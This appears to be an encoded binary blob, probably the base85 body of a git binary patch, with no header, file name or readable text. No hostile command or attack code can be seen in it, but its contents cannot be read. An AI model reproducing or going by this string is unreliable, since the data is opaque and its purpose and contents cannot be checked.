z`}<&u*;FhF>$@unrQBMLfYqO(Mb4bQL2CbI0278fO2EaQghH{nkx(jFU#&TVD4SZk zNwgN1i<+8IaXh;nyq^dliZq~QfIz`BC^dS~#byF_wY(Q+Biy+>mo8vJ>{U4zi1u&u zXnOKbaoxKu*ZSHsh}!lPm>Edzyl`)g)hVv9x*wYGX%mh+q~t`v9aggEl4Yp&WW4Pp zLWLrH9m5{*1X>Byp6huH1&=C?2x#P4A;h(efx%KVq?WJiBARL3CKa=eQmF znI%>D<@exRk0l|l^5WnFIr88{{sGJR|3<$}bC6~*jIxQ_GV7M(-=W?OX8m7#^ zu-Nl*28QRbiFE8p{fIj{u+rJHOz1=pD#TfFYBlmF{5AI(!SPYMCrE%M?|%o4*TnmG zu^HjwaRaiA>k?5j{F|1gYWHvFL8I>n;BW+-s54xzF%H^}xH$R*elnjxzQ88>1R}yX zI6&-rfRqBh$GxqSA_Od2hqkkK^PhLp@&Z74qxAG2eJ0Uk4~q=_dW zf;FMTv>^pTUf2*)&;ka7MSxDQuri>4bo3KmB3Yc?j!^@23Z!J6o&$9wSg$CGz>9_< zJ`PMlSQjEi*5VS+46d6*{^#`Zq2j7sy5gU}#UDC{x)H7Xai07TmKWv8-^+o26vW4p zTYs67TYUYt(UNP@;gyv<&#ns2#i|pxV$s$sD-pN}PV4Zy6i(}zcRjVL9=?*&Y2AuO z*u`n>Exr9Ga9VHarlv>S5EF49bC7=(UpX<3p62~L%}X2V=xIKBnvb65qo?`L$+5`v|0snq?mUmpw6p#oWCMAgSk59J#11XrgP#q3QaZp zINK9diZzM=72gEGbKoMK>YO37_o;fCP3OU4d6wn)L=V>018`%U7d`_x%i#3u$-b+g zi=WDOl{`04fv_!pfNHH`tF@~u%UAD-Ba762$zdJsjjIVHula{CkGkf2#y{X;96M7ZbH3kz)b!RhBC-4~LOrSOfi2%}H&J~%hGP@9e9{Ejv zkv_cjbt7?3mG0OdcE^}nyOsx3{6pP$LHQ5$JBDJT509YW1jomCBX~MzBvoOu%h=KS 
zc7|X-M>~#cE{5f`QdC`>%aVC?>;35TEtPYnQ4(9}yl63})qDntB)1;3B3lZF7!G@g zumfpZ4^aqitX24EAy6&;cte##*c~j zEmQ$KK!v|RS%x#NaX)c^qZSHdtj9Wm$_HZ5HXb9nM3pc#JOyiEvAEa7*#w7hY*C0~ z-p3|xkD5aaU=ieSPR!o$rrHNG#Du@PI$v@LzBM(Z7AyN{PEWObe5Sr9Wu8EDVqp)7 zIgSO{@|f|R3_g2h05IbJ!PCg#S!N=ldC>*`B8Ibzb_0EDmv(F7~Za8+4UaelXfD8_EyP+NC_*FLs=={2&oX+fHnu@F06zs+|^B79Nz2 zg$MEHPg!_yUTV{_gHf>2s=|YK^A|R6{xIQ2A-0=?oe9qtHz#Na16LivH`++YrBOOI zWwlv&WW%e3ossS~4~@`&f|CHx3gO>v{I?{?;ooq?jt&sS!uN=px!dr|YiP}&|3Z?& zNt~>R=uJ>u5GYgN7~SCdWQ{tVE*g0cY!@rl8Cn2UbH-EjE3Gcbmhu&bm86o)0O(g2 z=x^a$_u(0S)mz*N%Sm$Be7THV<`;6}UJ^k;>xGJN>sp6KmTu&BxVl*S&aw2Q??$>1 z4+^+Q=(B4)jaT+bznp#dE~=-93(KmSF^|b&rCgEG8=iX`&M3%WxU4oNXpLb?v%nsS zX(YQYIdbeYeugaxxa?f6Iq4Y_@9)Nwio@YE*s3to0f&J>ETM-P&zNy!a;8_AJ}2-! zo);A+FS2Sr-;;Ey&*ep)Jrdj!f-e4>S4wkpbhZZogz=9c`i-Iz$`1XaZxl=MG@masg!QT0R za&&*wUw|zT&rD7a!VE(14GiQF&BK{sMLw7iHG8Fw?PpfS_VbArLg^>83(~a8E}{1> zC}sY@?~Z+cIRW$~O~?GlK%AHhdIivbY$E75%6g`)(#(TlN0hJ3cSPaeXc1lH!N-dU zM+@d3V!@<Nxwh4#enbj0xdgZoVyE?D5>&C$$Lq^23EdNk4A84^EV$sm#zY? 
zJ%Dm6XWJ#85P99z29!6nA&#=bpZ{Q`c|}vw@-2Fcd+S0&+&_K0OUED`QN0^~m-`Q* z|3kR{|B$bPM>*URZTcUqE|Ty6( z*sKV|72oyPv|0qTfiMjpUlSK~sKgQ*OPW&&e)VKxTI7y%s0=*j5NHnAjYqtgg~h7v zv&$c^=_Tu!_7HQl|BZIv16d*oZ>Rw+dvCfu^KD^f71y2WY2$0DbkhDdC_YwCPSi@d zIH=q@PPNi*!}E$Y91NPL^=h^9NiE{CD-q$f##G-_LrP1f1`*iiq9Ei2A*SYW3)zj10JZIi8Rfl~jU%GbX{M$EX z*uESZW~IknedniFm3zMAOW#bV`f>DilxtMp*B$lyxPKYd%PwDiy1sv^T}~^$$yk1M zTIH&o?r2qJTJ3!<$|sji_sscvs=JdD?aC7`^>W|j+P-HG-d}28zTb{Y=R%oRM^E|U z*Q_Rk0AR2(tVwOZ@DMMLhJ*V?(KUozT9_Px+oE=skq-%GFe_4CI| zS^V_r?7Mz-diwPvlLy*+-}=H{U%zKATk6$)@AUjTo0l)@_go{VOmExD^|yBA{D%AX zd2-$oJgsyiwmzBexzr2$Julu`mGL*D@;H1yJ-Z$aYiFMP(NVk;@3Qhqs_3WJ-;3`* zek}{8|49|9^+BywyR1BZzyES&8M64X_bA+#PrcKTuianVOu~Ly$J48M{i&!t)^qxo zigk5!ZB{w$?pv?=ete}(8z0Xn--o?B`(}7Oyf`&E<;zpUU{#xG=lx4(%6>1MwmjxL ze0YB3dZ%#r<D8n_;#*UQodaE8kN@l$(?+9^DxB6 zv~SHX)#|Ws_4GTht!rZjPI0ICx}z|qW~Dkj=PTa^)lWG?$r~5!7p3p=^@x7Y&-$k) zmCBuVULA4r>8ERc;7{wP?bcWsc#pkr{GIPz)z3~vr*yqc|AM}LRP(s6cfGF{{qn=rxBmT|*e~|qe{40H zkKay8!f5C@XXTpCe?B|ysrj*M-7q)KxHTPp4g1aIzKm}wc}C@KKC0h=rp}!f`{nlG z@}^q*^mxjg`o@_iUf+E>Z`7?~DgPjSa(Rgv$fNTIrEw+|TY3Gw$KT%C#&@-OlMnkn znKoKaU$~Rp?Rn+yws|%AY!xrw>le2dx7R$IyS$Lx&$1;n4f*QYmetK+vmPZbkYxM1_%IV|H$GYd9 zw9LnvTRScHzMg$6eU|Ti^$Yu@{iJ=a-A&{XAgbgk7scy(^TF0mBIoEpoSt7#oX?V8 zE#66$;q7Q_v_{_^Z^WC@4SRpBy2Fc){`-&Z5`Xt~pq#3Wv-^+MN7az7PWW=^grjny z=s4%ilj`|Z*l+*tyjHKCSDorP$eQy~y?T~&PQ1r6+WxcCtX3*#ZQuWV<1tg-K0gQi ze4A99a%osO@vd$v!_#YK`0@JwdeW{a

YgQ}Yz`OCnc3oej(7;>FqH@bL?O^IbnX z<$6;6y!d!s{B%_*7B8-wXGM8hFIOMy<@;&RC+&;- zul3T|fXcZ_w2$j2gWk!=pWfL`TZeh+XG2TlhGT7XJ?Wh(U+-=o{~1Vq>JpoatTRVr z2V3y}Mg@G!a34&~Shx&V2uo$;7A>yP8%;wcuBF)6JSee5o z8vI9)f3Xcm;^n?WH4-;Eq3YYcF?~DV=*tzy>bKw9HAB<%FKy$S&>GZ>|NQ5cl|N#- z{xeuT=dFqY!?Qem7K+eUFDjMKZCIR<;~OCbqH?W<&PkT@1l!`Qr^DJ7g&ehEJyW3M z$|-{S9~OqgSVXP*32HrPns4oFW^~3=8aPRAV7O#tYf5c_)QBE@^*A)?<-EYTsiWQ$ z+Z_WSNf|l#_F-b#a6ax?#OIAcr#a|@i@_l{CcSv(r4BdD3tQF#3BwJA=r{328W=5n zmrAv|BUn*vVoR_u>YCw>wXQenbpv#Fb$A>g_K&nRE&-otYD@wDj|!ty?TNZ=0lKZ? z8fS(ge7~4pe2l8|S=MsZk=U2BU^E(hhIdabFf1m;T%BP%9u1Wukyi~I@Y^){mO*Wf z_G5!*Mf2S9wRF-&5DS;s#j<5EY94s^ z0^C4{g8;Xr*P^Qp(W2Aa?S zt4%)PGg29HhmqPSPp0_&`SW`_OJz4pccWav~TCuG$rClW6GA6kamPBPjq%h{ov~|4U2gGs$x;R*#xy_I=udBUDX z{O|wjbpACzNqp&GjHof{&~p)1&ZSjp-c(DK?q#uFDFma(t~s>t8kHpjArF*!TfOAD zc*+1gjmlC>{QRoXZB#DH)yuOK_b1+5UbVaUoksDbR{4PNpN-;mi~dzTyS!>vS}^F36y?t1JikM^NXY{AwX$7Z_+3a?7n9Opds{~y^h9;cvbe66XAK1;X zq=mLsUIj)}w#taky-24Q86keU54|6oJs});W0>$sDbuQyuA9~N-CXMPV7ivs z%h3az7juEcCN-WOAh0;hV6(!D5Fc>$!7|<|e#xDB7BJQjH#O*F!w1C zi(`i=2o1wN8h4Mz-JK?W^hg~&Qrj=YI%DmkOkJ0XaKo!nhJc`c8D;AMTg8dPe0=4U zT)rzT^WklPJXGzr3n5=?7AuVnwcDa*hp62ab+)E<+lJ{MFJtXkt}R6U!3&OXJiDqo z8pjk^W@QbOb*A$W+*qsd(ZXe{_~VsD)1uk0HRjA(Z77;H56W&u)3%vciZqnuC@=7g zlxPU3SjGdn=6+kR(gMjr=wXsUfb{ZH83bq*wZ*wbf1}o<7oALYuC4|s1lq(Z0~yJS z_el$^fj)#KcPyW2`t*x}wAJP6cs%6KR6^}>WOfOzx}=DAcMgkPBOucsUrr6+dQp|s zwu(`VXYqAG9(r1iy1OT;*6lkwd^4WE%6yca+sIB%KDj*2H_xA;!Wyq|t7Rw8t|)bS z%e7BRjq~egsJ$x6!fJp7uE4NK0I~d+3+XIhe+CRm`8C>wz!pShd+j0wH`XeAv>=7! zkCTg=g*+<Qom{a}x(8aaLBkq9B`Q=g2pOR%2; z77e{dGN7kSUpWtRkTkYW`Uz60?*TjPPS8t(dMs+JB1@RDE(SZCA)-yUd-Wuu^)9fT z#j-muq2kW2)plM&p`Bfe?7W2fI=j}^c?o58b}gy%5~}Gub0wWaR?%71Aos0P6AA21 zb!uh}Q)aSV?0J2int8Q#TP(n#s9xQwlnep?$_}MzXw!+Y=8z|4cUhKQ-Z+e9zj0UO z@C8ABQFe`00CntWr)>*T>#o(V)YoLy z%L_8I1|+4x?OxrKp@? 
z@`x1*JP1-TNs6AzTmj(YR^g)snV917%&`*NBOxb9 zJ`N-_Tzz&}(HIL1Oxc9~F^e3l`qmw!C|$ea?G&D$kU?y8|0Loq$@8<|;CVUa$>Lrf z&wSD+B!#GDfWUJJib1NQH^2I3|K7B5=HF!((6w*kjBG*KGP(({u|CR}qoNip@(?;Y zH6CeP_{h*{hPY5cAUStvZmd9tLw_w2CQQ!BL4i)whTdp)E&P5|)eO@Ua7GYA5oL{F zf1;i-Gexc}QAX#TwGDsoQ2fJ$LE~625iMBJ0w8b#g(;XBz?Mw`hBgbYh&yWVz1pI^nQ;Kl0wlpE=1b6 ze6&@3{$7Ym6{(MY5TdqB(z0c;mOUo1n0#cd7k0aBE?Z@F*=tj5Gl?y4RQwnZ*gjsc z7vl=s#~rryB%aGB_5=K4hwzQ9P_L6}Hb%P1hMJADb}2nwiybd}y7oWW%vEYU738z> zm*~35-aex{rCF-oNWuo6QPk`ZKBK6!bUvdMh&eicjuw#pEFfG#OtgSR^tm5~5{?p_ znB@G41C%=3)cVX57!@SkFpI6uz)f{WBMB%Bo8+MI{9FmNgvh`iS|(%X;Ywt)&#kCt zNTV7t#se!TdC++2+J|~M4t#51h|%u%Cvkav1)j$ zTqLBQpUOoNOzX^bCO~u*dosfJ%maT3P7~fL)|;rMj@(Z;BT?1H1CR#fm7SAdgaZMi z9vLG*j)x<^f*P#@3e6ic3+m(?;@=YYMg$kJ4)$@5@i3ct7PXvFbb+3{iCd2hf9Qa& zqp4$@Q&*?$ag!k5G*aE)IW%T97s-t22|q-Qp{GyzA+1XJ!6o`@@-Nd%V|p51mT6Lf zM4bH_&`wf-6J&KMt#nmF7hR8JUv%RadEyz(?H`xXd^U~bs);+y_j|ddN$w0b<1hpBVRYeJa-PE`(>mkR&8yh+`1P z7C3q3jp}F@92`eto=XOaMGU|r7C3Q-{HOuA@tkVGqgiYaur{`!zh(~m>DVKXseY0{YT@WJ`^=Yg zoud(q)6m!*g;?SZT6#>&Hn^0TGUYZ?Pg zKU3^bj`}BoS@eArH3*Qf>+u4|PJfU1Do#Wll3`dd_*ebUX4^fC@Q zAv$w3a-;ig)}CrLj)S9XzB zvDHFBaAzszY-t**zI#Y2i9(%o-Vn}53?+1|U=tDHZh3%MoWwYbu59dC7z2&t2m!~! 
zw_fm^D2s)md&W?GFmcXOFIt`S)(aX{nz}NZbO0ttFq&v+wj~_em>b`tW z>dsKzrAb^V=gR}j6FH83F`RE1&N%NI1q<3Gw_j&6>_?g=Vnn-<@ev%H;8VOef~Rx$ z-c^|GGJ3SWogwJY(T=^)Djm`CVd7@U7W^d6q?7!ed?tJ@Jwv4sNs!k7#1;f; z`;%}8Zmd=KXd$dM{&*HQ8{3e%kU`|;8N`a*Bq`oZ8LS%V0p-bPOkx=}hOMR;e9HtT ze{dA*N5?b9!xNa0aZeuLr8cd5^U+L-SZz-1AX=3s1$pf)A+tZRH5$z3;Jf~qT1dbt zKE{w!%#s2@m4}rSb_O*5ZdEMm9s#I(M4iS1#G*~U zN2uvuyCNyZBm!zfjLEEB${3Tyj+bLhQf;R_rn?w}axPw9R4@v$W<)}R=6Gv%-r9w7 zsFh(eVuoWgEHCkbB1#;W;blgWWtrvVjKr}#2fuTa%(8#SpDf8S66^*p%K_KLl{4R> zzvF_?EGkY02nmD@lYEm>K@>VRyo>$^k+(aqidbCVn8pVLzr8MwoQd0cg)-=kV`L5I zZO4YjIn?PudxUcD-n~O7hW%9qPJ_yoTH_A=Yqlf)h2DUEO~3thexo4T6ZDfKJ(15Z zYj#$I>yG^zUU-1FUI(w;m~a?_MXyy*`|A4hd`uR4px}du8*7-HiD=dSwjrRO#>WyGY$$FD-Kp?(*m&1z?0{CV|EP#0A8TS(xP9%lGB6U%I zh-Vpuu~v0b=;OZ-CrdH|Lh=n0dh#7J|ay)j&jIMU1dFAP%fo z%?HF6V%6sZ3+h~7k$ksl@)=x;I}CF!p!!v_4F8qFZ{yYF3rNn1v_`xFqP@Tgq(ppc zsl-SjHFalLmJw#sX5>Af!tBrA0`%~|gPv%@!o-rozW|azZNHnTl<^tQzK-S|pYrVM z%XY0E&WhD}mg%d!U`VPcsXWUHq9BN}!uERko*aLzbzWqH*Em%Xc|9+PhAuM#mp6Du z(G@YTb4-sh3{B-Vo!2F04yZ=4QKhf<48Vn`$%ZB>x^C#I!0Q~(uzFA96phnnule5i zeh|k?U;v3f+7}(6tpdKjWo`Cv*qSi={@!qVhU<9yj+m`om5Q|$P+H;RAXQHd5)!NO*h3iR_rC&5Jg_dO9~?ysxI9ntI-~OMPnK57MZz^{F?w#^~2Ic=Q_Y}s~*}~`h!T;Cys}E<~KMU{wN3n!= zuP^@gS!AbdH(O=y%>VlS|GzK%qx0(9$9kE)`TfNC{eAh=9t^KOdZmw2? zzy1D;`#*~PU;hw(uX@GTwkmJ27t>61UiW{=(>)v)kOWy=-~ytqibpPR6tg!YU^X!V>BtCAO$p%;;umv`d?+L38=GV4v^i4Y`ao3)X*DD3#UQXf$^ZWc6c))Sr zFYf!KEpo8Kow9tm%O8e{e&jh%+T;|F59bs(9*KVNk!VG*xAA0xE^;z8{!h z!d$Uo_SY~;EJ=Q*qp>;0xuPc85UKE!z?42~3CC`gb5(wkIahH?W>>YkBR~xy_PNxn zqaJ1<}qc-F~RBcB{&VK?C=@i4+ii;_FN|DeeVBQ-Kf*YwR=}7nk3o&kaBy=BO3?7e>a3%~(BC26haM0v~Qz6z> zJlJGd>5Iv|EW%18emU5Df!M=+ge8TD#z@=(L)blunQPYTE*HjwX=kW5?#;?r;Fsal zfwyF+$1DrxpSady#G&^%#Uhf@aL%HiuGV7kT9mZV1I5KiC|O8`h%<)8S*&6dh`7Oj z^M0qfj|k<(>zg_D2bwr|WAQ1ReJ1(i8Do`Jci3E{Ye_eXPhw@}

  • wBak7MoHy~M z2vL(jdE~Y1#wEi;5c#xLm%gIk#cO#po)L1A1lRyij8n+}w zLR3yaI%fj4kfSJNE4qQL4B5S^pp|K5G7onRI*K+_UF1UN&M3PyiKUvK@ktz}=4Y4) zd)o~Q6bgGaR#+04LpFJcV_DH-S<#J%I+hhp^Es9kJ(d+cmKB}<`~+o1Q=B1_(mzHj z`6e&TtYLzehEH(PEcU$YqGbBRetvfPsqq;f z4A)u!4pnW6zo^M~&Fhm5)uy6mhp09cb+%Y-YG)K5t++=k?w`wwE9MI#pKQgAwofV? z#XzFvV9;tDv8>3g1xZl0PtF~J8*3Flnw6<~96IXAoMYS3G}l(5nzh!^PHiK>LM zQi0|1ZH*nA=pn$dR^g*`PISt>wmS*YcMjm;oplr)&Uc67dED8vF;e)TDf`>m1s$%% zb{^=%MAPbD(6Y9;wYjys>>3 z7Ke!Hc*H!BuQ`hAtlRsE9m)~6+RLH5)&;iuvyBVv=$|_Jr;h%qqkn3bNvsV2?qc!U$V5nNjGg4m5coNjjD1_-V`WsmO9qxHbVOVC{IH zEz&hN6v~^mOIavyvE%fP(*2IE3+3^em)BzXZXZYIqN`IW)i3Wp=eZ58&ZyZTT%A#8 z`?)%2SUQ^8j;6LhnW-(m($p61o`ZWj1)k;BgCuY7=?uY*wF)1t^>jwlToBpv+$o=@6j7tiPN)OO7|LKg?5 zOK`}DxjL~cb7>%iAJmC+^8nX>`B#5BpQaA|cFA50ns=!t@uGd2>w$hzKFw{CrEKBJ z#DsnzKjw^eAGN8UNt*(xoG*wwgdm0B##)7s7MyaM{c}30>AsEfj^9Y>ufjyWv$u*u z_NTio8S_=Sk)f)x$a?a`W7cYeHzPh~ z$By!BMOfL=ml5mkRbaRF;)Z=xc^X@A@O9A$r~nOByxDBPN)OvNU_vxLM%8eVUKqr- z4H6nld>2KMl8L_AgM)}O7!a0&-qakzeGGf-0D_V37}V8|ZM+~FsxS~yl5w_R_+hC% z)N`I*{hrp-B8bx3i)F1Qww3_HTIpiJJ^WOc%NlqekOMM`CbzefWu(Fp-gG7&(K}Z~ zM=y_z-T>6i`r8AzT%=cj!fRx1fTy3q*RlfIADe4+2E-m-7K6|Cdz@kPsW#zS~X!mVSid+S;VZmd=KXsvHE zn&w*H=B(8Q-)4NwxNmb-nP@BDW~{rkSG0JA$**%9hB4Un*2%=Q^i|$N(#=ohJ-n?~ zQT4WGjDqA69+@f)2@VT8($tkrs%UKGTeKth;xs8UB~7#NCi^t9-jZ8fc(m9OLmSf% zUi5>DUKn89WaRbmO3=DM(cpbYBNm0A(kxc5f{YIMJ-`Xibwg31S@>i{`l4aXbe{7% zzivc;r}t?J`M*qN%wQS9ER&BT6X&CT(SFT!ApcnBWpU;p?!Y+z zZc5kXJQLg5eYpttb}r1r=eXR`hxz2VuIac*K1`w*1*-v@Z8h*e$ zu}l^u*T5S)RMdmAD`8ExN9^4&P)40yBO@Nn$Ds*Y7%*wu0{;811(-4p(dz z%BFE79zH?l@y^@PS9$bR9(|QB)K~cfLQalezN44#XY%rG2$EX;2{Y09syi_J^-Hm1 zj6n1naPgUmkC=t$*5?oo{1ijr46zN>A8t7WsEb6W#KE3aN@E>*JSE#YQkfllKNh%Y z8N#I~yXJ#YGyEv`Z^}vF*N{cu3rO^FXkeXlViTNEMQ4u`6hjps5^zMUHC;Q2eGiL! 
z2F)gS_&m|R%VX`E|1>&EY`pv$HB6ZRb+PC4Uiib>0uJSkzn1uBjs5&(gEu~Eb_j2L z)Y-B(zS}*kTwb?k8-bVvy4_N(*qVFV?KXqezHYgIt_VfpT|*lORc zeydrjHHz)?Sp)pA(Y%7b+IQX3)%9gNgrHn$R&NNg2TlL|zhvA>^QO{7^F3U`5UobB zRGI5GHc;>|u*z2T*+WSYVYsH@Ph2~8I4>Xunzt6DSm6MCV&C_V_Uohl`cG@W{sV2+ zuuMWCRzl`^@L&p_VKxA?gAqLhH-1$qc(gW{BAVvfV2W9*4Z#%gF%J+-5$kR_nBup{ zO^J=U*?z{u&RT<5bU`SROWqkBIwg0*GfqE4o#~mN21OT>=+^Tc79Pf8~tI8WZ5bWV6S$a#LY7t=J^h7duEZBXRrT5$B2%5!>&vd3P zbTHi>oG{@Fx%axYk^K3LXl3{xXs!D0Oey)YMn#9X=Eo`lv zKN?5zV`K-N235Hn5*mT%rpoT%L|*Sa-hQ?#UB%mXmC`4?eaA^2&Yj%8>D;|L%siEo z_fQj`JLDwG9cpfLFa`%ON>afsmyB3BT1$YBzK8*3Flf_BMIVQOe#OopG>fK(AsXIFFSTsw|1Od^kJxadYLP(X_IAGR6oH~+#*Gh z_8L)0H6kknBQ}izKBrB0A5fNq5!D7$Nl&#%7+w7O~{}I+E}yfbjr8& z%q%dIm$Hf!>`T8t+Jkt2lZD)8l^zu!7D)C`JXTJ}efX>xl26~UecgT7eOOrz*76j3 zqTw+viHYiTuIs1e5Vu&_Jlv4N+98>6NG{x$dm~oi(orlZ)WU(*Qc32qmz6eF)e(*= zsFo^-6|y38m?2q4Of{sG&r0H$Ol3!pHAJv+=n~VkYY-TWe&y)_;lpM<+J>u5WC_`vdCle zSy4FDECoIlj|GZlghS0z5Yp+fRHwv;=)f0zZm5<AmZoo+Rxluq4ZgLBX!W|{I7 zofYy2Tg$ZaGE%qp9#Txl3Z!iQV6znYRQnP($-zXlCosHl6TN0)jn&9?P-m^jKcb<_{#IL0OkmvV!m!)Ec;>ooR;*DW;@Y zITF!h99Z_S$1GEFA0f*sheB*x{96o}Qj+Ae^1)`APF}J~ zRyh#_OE}Wz`9sYzok0yWJTX|yTNMtq#9iNTogKJ4mruvm;S_x+ z4Ufy`rF3jvIh5Iuli8FuJn>)*Pflk7hLhL9Hi^uo;y$3@9ZX&-sb?8^5X?P&{E;5J zk>N=PLM+dvb6T)mpott}NGX+4$q895f2bkTiD;e=q}Kt4`ynJjmpGYQ}|-M)kqLU7m%?mZR1Ph8^+#|JNE$=Woe zls4Xn=R@ID9FMmgW`4+Yk|fV(8D)8vmxjOf;JlcQVh?yg;Kg(XH6fc1DK^OHdaL?4 z4sd%6^I|$93^2Sy2`^qs7h)u5*@Gcg66BP#pXmrkkV zl*l#HGE`R^R&CvQ+Uevaq&!7~B*_O_f#%rzA(l_46#&B%0~0WgWW{4X?mDE9E~<%_ z4tDYqQnGa=D;&x-BS>so$1r~&;U!3%oQ@SJ{K00KdS4zYu0Y5usrDrtgTgb(-kT(f z-P*WG4izpYC=9cuylnZZ>(>o?vZKl+GF&QFAi>G&Kt3;#NhhL}fZrWtNI4~9xq}VK z3aN}Rtb8zeDGHL1(oYf|gX*T{I-b+_EBauUAbn9x$M7ULlpH85MO+bHop2^OlrLHo zQ|dlpto;7=SW!&pnh_3Xj}=q0bt&+&9cIXs!s}q>d@;|YJVhVOpeCj?s7W&sty|W9 zLn`^S!s}3{Xo+D`8q}0Skq=2ylnSv2ixH8S&?2(IWy%MlWPes5v0|zrIUx#_Z@bXI z(5p5yv#jk$1)VY_D>zuZkHkwU-QNd`YLZfhi{S{h;IN0YuZ&fF_aQ|-?Y;~p$$T8% z_J><3rDqQx_5u;T?}Y$K3MqEQg#bPzpXkb7U}_342jjF(W5-i_mO%`P*_nFlW!uJ+ 
zU$w^*KTG~Cj>mXNIn^wAA>aiIx=*RG{VelBI!h%RnSgIcX2X4GRdyyHC0TeaDV0o? zR~BZOZ44dX+4`Cgh)W?QV#6@beT7$^NoNAi&+Z`Xd)Ujfe9C)XLZ}t&djl%Zhq_PF z4Jdx5`|!cFnf)b6K4nNQmL%Mq2{?OOY&NnVtL>n=TKXZSWS`fvGm$yeH9?tSxpYcp zbRDVg)yEZku=85VT)G$$mf^B8=Ii?lFPTs4zvS5i#fZpJbp8hNVIoCj?^z1z?(FeQ zbiUk|Vr3y+h>;lFg*?bC<+O1Hp{24oD=Ks9s-vy_Y_gD!$Hp$u8Bb%&ad(Zv!*?Nh zF5QKIAdGx}bG|GwOge9n9G<)qa%pTiq>zeY^L%u0pHoCy=i3h{%V{;da4q+pB}p%m zW=M{u(as&))yJA;j(6T93d_kU?|FssKKnW?6pl}8&JR6%)El&W!UBcoQpP&7Sw2q? z+nRcN-HTRIp1fdN9x7l%5mUy;GLgr9;X2ZmOdW$C`iD)*O{N?zJlc=FwL1r{cs)~p> zN!uS;5OKb`R#M{BYn+>pq)csrW@h@Yy$E%&EYh*usX-cKoctKSk5dJPX^&w^oj#g6 z6BofoaXgw3bDJWM504 zq_T%jLdC!!O=hs0;(ZenVdAGTw^s4hgLOlXDjj&YQa1sG%m`#f9V=3)C(;_@aL+NC zrCl9D9ORFs!v!_ZHPuEvV>h^Q4)31lSh&bJNob0bM?U~&RDU>M0c{^{HLGp2Aun7~ zy_&U|;iQD*bc;PN*Q+W=_mahE=@nH%4^c}$D8buroY)Jfdn+{Rw=MW;%{4^ zKeZk-&9}D7#2+Lo$2pxRURZ`}uJc=L_~f}_ql$28ElllLj`S?k8v-L5!g|pxx%f?5 zZUGS;4ku@Y-p&3LCs@Vb!qLFRI|t|fB{hDHCm%ZSXw@zNCYDDXsf1+){nF}W+0^;_ zC1tDp{rQ)fwcqqK2QWCD%h%tBZ@UCx1Yccm)a!a=;k$F|_Cu5PF9M}TTW-gE{Q+t$ zvlnFS_i{0g<(dA3Oh~o5>Z1xo1*7F`8X-&@;>7#8WU#X1>4uE{I7{dHME(VIR%%_8 z+5DGdVqLUzV%-pjhc5xdvMjDMyIgUHLyUwABeBZ%iFHG8W3A#;Fgr8uN1w@3dcQtb zsYlTYEUHHzuTJ9H(X3s9b|fcgM~fXVYez2=Ngey6)5H0*UEhGy;8{&9Uw>YuIqg3j z&JD1FoH}-V3oMm^Tw5cOTC&Qe<+m!!&pI|%nKDFWA{rA_m}V84{x&!N7>vtGA(om; zx*E^qMJ`cStD7V9UiH5tIA)VAc44@nbvYjVGF_#z(e8e@%C=8srD$4hQ@aOIzpIXB zP&8ph?LO?%r(M$ekt32(BfX-;@GBH0AyHA1UZkQlt4R^;tT}~g6wp{VKwkGANbCQx z_a=UcBw6D4zY^Os^C|5vAn$|ucJCnKQHolkWmPr(WAhYBNN5sNYG?Ov|GgJSk_pKn zQdh4|kA+EO94}tHE8g){r6Vyg->H>i5rx7YR{V^6@H8V4Ik4V&0C{0lpc_zP9mm3O zBM#Vh%NQjE1^{%UPLjp_MHJdx6uPNd??3FTCtspyrMXZPGRvx7RyGiY#B@`w#G@JW z`Lte4Nu0#e%z;>7mRRG>HEq-ho8hm|5zpdk%k^68_{O$t(cyZg>o@&47_|3bNx>a` zfZN>Z-gO>2d3Nl}akRjWoq#t4Iv|YM95(poGFAoK2SQLB7+L{jh`t}t3N*cZt2U5H zuRG}hM=xT@AeuCaQcUqJEekna27b55RQ(Jy^)pP=X;W-+s6xw8ktISmDUn7&F6aeCE@+BknX+kWYC)D% zMaNWRW#OaOzkx)n$)qyAC9*^bGyEz8Ro38r zc$fTtgudPUse=6ST_<==;M1#0uRk6(e;=&$ z2hE@RwbP3asRxCvr{J5zK4z#|SsKBxudGNV3C5PkOOCn}YA!GJk06RZRkG7>)5 
zg3;Mji-p4p5?C&GK?EUyn}hyvM8zbD|NH^lDLt~!vI2iNL9FOTtKD8%cpBrMe; zzf^Y~FF}@hC=<|3loG`rwXDizMI)6u`Df~}%pYIy$M$S%+A}Dt!7yEuu}toU?&x+@ z64FMId1U>IWFO$$)ouqjJM(rTn&iE3&;{j)Xi^~Kg4qjr0$ZLF_36bx=W_tl1tQ;a zfNf##|0Gy{15P=7LS_2_JCcm*-Hf3YS0 zZ+3!(?4QNE&d}{VliIGUEbF?eFISe4<&OtTRb<-9S5=XpU3~bWa&e4L=m)Y-3k8a$ zg35+p;myZsqXPeIsz48E0n2-F(~&n8fRza-v_X}Y8lDaeVhe~+eoW9ZPa5^T=jz&A zeO^n|hE4~}SkBfUEj&`TZLSTnZ&L5wv^{*6+~^mM);rz+*;(*JL_* zo|NR<%wO0UpT2~zWcNsB1Y`T--XJxz@6-mu4-D1ZUQ8fg*#uHK{cvP_+*7u10?|}U znlpjO5}H6{3nZYjvO$?eG2K)v@n{VbNHg+atAn3Y1B!~K$&c^FlgMkeow$w1hmhNT z7kc6{1@-1Zfmc+}jellp#t4h3#=Pgjc$iHY5O=zO(y2aRCLj^S>6x&BQx9gO8C2;f znKuYO;?rk?Q9ILs#7-~!V1(hXtyE8&L6U>*39=b~L%2(dLbQAds1XP-#r?T$x8^HdMlRFo&2NtaU&lK(!&8&s63sGwCQ z)yoeTSFPjv#c8W?esFbDxvX)8l^g!Lw|$Um+C8B{gYtRUf=RbdY9HQD+o2F2qkb&f zDUxQ99d16bBxyI>HYMq8`YHq-I7()b^~2^ z4BxlSFz|vv4@2AY9m~SvBZ_2)st)sY3`+*KsA-xL_^xI8iW`I`uGv*|$Kz2dwvRnX*EO~}(s4x-N z(t|*@VO$v8P&CP~T-+tiG+-5`=c=~qy3nn!sfO)Xj$vDhuIY}WIF{_1lB_DO0n-OK z`L6Alt{IxLX8Wokd$0;!QH?-XEW=a+&-MYLx~Zv>=X;W30Gth9mkq-cL*Fpi`dt|dD@d{SJ^3N1~6*Dc?-0!t19 z%Y_xEZ^xElZ+KHm_*8hOkTKWqKH(c0;LJt{F^pv2`<; zz1mYmdX97NSunzN)uM4PaqS)6$M@c*R1nb0lZnTsi%7Lcs411rXNuIL|i=YfB zf1SdN^47U<8pdE9atmjlf`Eq4^SqGphzMw1CK_6Mx|wep3jf~J;VC(TgP{8AD*$g0!z zsAvufUt&zR=|kb-x$}x9E*NL2}v#Hn>X_R=@{xc6C~RP5+Afpu7U! 
